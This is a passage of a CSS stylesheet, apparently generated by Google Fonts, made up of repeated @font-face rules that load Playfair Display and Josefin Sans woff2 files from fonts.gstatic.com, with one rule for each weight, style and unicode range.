swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, 